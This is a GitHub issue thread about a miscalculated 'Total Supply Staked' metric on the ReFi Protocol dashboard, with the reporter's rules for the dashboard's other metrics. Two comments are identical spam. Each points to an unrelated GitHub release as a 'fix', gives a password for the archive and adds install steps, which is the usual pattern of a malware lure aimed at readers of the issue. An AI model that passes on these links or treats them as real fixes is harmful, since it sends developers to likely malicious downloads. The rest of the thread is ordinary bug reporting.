### ISSUE TITLE
[Marker.io] Total Supply Staked is calculated wrong

### ISSUE THREAD

**Issue by ReFiProtocol** [ReFi-Protocol/dashboard#38]
[![Screenshot_2024-08-28_22-04-42.png](https://mrkr.io/s/66cf9efa524e3837a7269852/2)](https://mrkr.io/s/66cf9efa524e3837a7269852/0)

I believe the total supply staked is wrong. Just the top two rows in the leaderboard table show that over 23mil refi were staked. 23 mil refi/110 mil refi is roughly 2.09% ish. so the value can not be .3% here

While you are at it, please make sure the rest of the Global metrics follow the following rules:

Total Supply Staked

- Example: 50%
We want to put the percentage of the 1,100,000,000 $REFI tokens (total supply) that are staked on Solana

Fully Diluted Valuation
- Example: $1,000,000
On coingecko

Total Value Locked
- Example: 50%
We want to show the percentage of supply that is locked somehow: liq pool, staking program, migration contract, locked supply on team finance etc. all of that divided by total supply.

---

**Reported by:** ReFi Team (info@refiprotocol.io) - [Contact via Marker.io](https://app.marker.io/i/66cf9efa524e3837a7269855?advanced=1&comments=1)

**Source URL:** [https://beta.refiprotocol.io/leaderboard](https://beta.refiprotocol.io/leaderboard)

**Issue details:** [Open in Marker.io](https://app.marker.io/i/66cf9efa524e3837a7269855?advanced=1)

**Console:** [⚠️  2 warnings ](https://app.marker.io/i/66cf9efa524e3837a7269855?advanced=1&activePane=console)

**Network:** [🛑  6 failed requests ](https://app.marker.io/i/66cf9efa524e3837a7269855?advanced=1&activePane=console)

**Session replay:** [Watch last 30 seconds](https://app.marker.io/i/66cf9efa524e3837a7269855?advanced=1&sessionReplay=1)

<table><tr><td><strong>Device type</strong></td><td>desktop</td></tr><tr><td><strong>Browser</strong></td><td>Firefox 129.0</td></tr><tr><td><strong>Screen Size</strong></td><td>2880 x 1800</td></tr><tr><td><strong>OS</strong></td><td>Ubuntu</td></tr><tr><td><strong>Viewport Size</strong></td><td>1440 x 788</td></tr><tr><td><strong>Pixel Ratio</strong></td><td>@&#8203;2x</td></tr></table>

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ReFiProtocol** [comment]
🤖 [Marker.io bot](https://app.marker.io/i/66cf9efa524e3837a7269855?advanced=1) - This issue was marked as **✅ Resolved** in Marker.io
